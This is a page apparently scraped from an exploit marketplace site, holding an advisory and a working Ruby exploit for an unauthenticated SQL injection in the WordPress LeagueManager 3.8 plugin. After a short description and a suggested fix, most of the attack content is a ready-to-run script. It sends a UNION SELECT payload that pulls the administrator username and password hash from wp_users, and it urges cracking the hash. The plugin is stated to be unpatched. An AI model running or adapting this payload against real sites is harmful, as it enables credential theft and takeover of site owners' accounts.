0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress LeagueManager Plugin 3.8 - SQL Injection
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
#Description: # #An SQL Injection vulnerability exists in the league_id parameter of a function call made #by the leaguemanager_export page. This request is processed within the leaguemanager.php: # #if ( isset($_POST['leaguemanager_export'])) # $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']); # #Which does not sanitize of SQL injection, and is passed to the admin/admin.php page #into the export( $league_id, $mode ) function which also does not sanitize for SQL injection #when making this call: $this->league = $leaguemanager->getLeague($league_id); #The information is then echoed to a CSV file that is then provided. # #Since no authentication is required when making a POST request to this page, #i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established #session. # #Fix: # #A possible fix for this would be to cast the league_id to an integer during any #of the function calls. The following changes can be made in the leaguemanager.php file: #$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']); # #These functions should also not be available to public requests, and thus session handling #should also be checked prior to the requests being processed within the admin section. # #The responsible disclosure processes were distorted by the fact that the author no longer #supports his well established plugin, and there are currently no maintainers. After #e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin #and not patch the vulnerability. # #The following ruby exploit will retrieve the administrator username and the salted #password hash from a given site with the plugin installed: #------------------------------------------------------------------------------------------ #Exploit: require 'net/http' require 'uri' if ARGV.length == 2 post_params = { 'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\ '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--', 'mode' => 'teams', 'leaguemanager_export' => 'Download+File' } target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export" begin resp = Net::HTTP.post_form(URI.parse(target_url), post_params) rescue puts "Invalid URL..." end if resp.nil? print_error "No response received..." elsif resp.code != "200" puts "Page doesn't exist!" else admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/) if(admin_login.length > 0) puts "Username: #{admin_login[0][0]}" puts "Hash: #{admin_login[0][1]}" puts "\nNow go crack that with Hashcat :)" else puts "Username and hash not received. Maybe it's patched?" end end else puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\"" end # 0day.today [2024-06-28] #